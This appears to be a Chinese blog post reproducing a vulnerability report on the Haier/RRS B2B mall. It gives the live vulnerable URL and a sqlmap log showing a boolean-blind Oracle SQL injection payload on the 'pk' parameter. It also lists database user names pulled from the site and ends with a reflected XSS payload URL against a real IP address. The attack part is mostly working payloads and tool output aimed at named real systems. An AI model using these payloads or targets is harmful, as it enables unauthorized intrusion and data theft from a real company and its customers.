oracle %3c %3e符号,海尔旗下b2b商城日日顺oracle 注入

看网站标题一会是日日顺b2b官网,一会是海尔b2b官网,把我都搞糊涂了查了备案,确实是你们的http://www.365rrs.com/notice/noticeDetail?pk=8796945030977

c362bb455c996976b3c55908247842a3.png

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutualconsent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 14:20:20[14:20:21] [INFO] resuming back-end DBMS 'oracle'[14:20:21] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: pkType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: pk=8797010566977) AND 4248=4248 AND (7138=7138---[14:20:21] [INFO] the back-end DBMS is Oracleweb application technology: Apache 2.4.6, JSPback-end DBMS: Oracle[14:20:21] [INFO] fetching database users[14:20:21] [INFO] fetching number of database users[14:20:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[14:20:21] [INFO] retrieved: 34[14:20:23] [INFO] retrieved: JYQ[14:20:26] [INFO] retrieved: EAI[14:20:29] [INFO] retrieved: HP_DBSPI[14:20:41] [INFO] retrieved: HYBRIS[14:20:49] [INFO] retrieved: SCOTT[14:20:56] [INFO] retrieved: OWBSYS[14:21:04] [INFO] retrieved: APEX_030200[14:21:19] [INFO] retrieved: APEX_PUBLIC_USER[14:21:43] [INFO] retrieved: FLOWS_FILES[14:21:56] [INFO] retrieved: MGMT_VIEW[14:22:08] [INFO] retrieved: SYSMAN[14:22:15] [INFO] retrieved: SPATIAL_CSW_ADMIN_USR[14:22:47] [INFO] retrieved: SPATIAL_WFS_ADMIN_USR[14:23:15] [INFO] retrieved: MDDATA[14:23:23] [INFO] retrieved: OWBSYS_AUDIT[14:23:40] [INFO] retrieved: OLAPSYS[14:23:50] [INFO] retrieved: MDSYS[14:23:57] [INFO] retrieved: SI我网速实在是太慢,加上对oracle没什么研究,其他的就不跑了送一个反射型xsshttp://218.58.70.195/brand/search?text=%27%22--%3E%3CscRipt%3Ealert%28%27xxs%27%29%3C/scRipt%3E&code=3

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值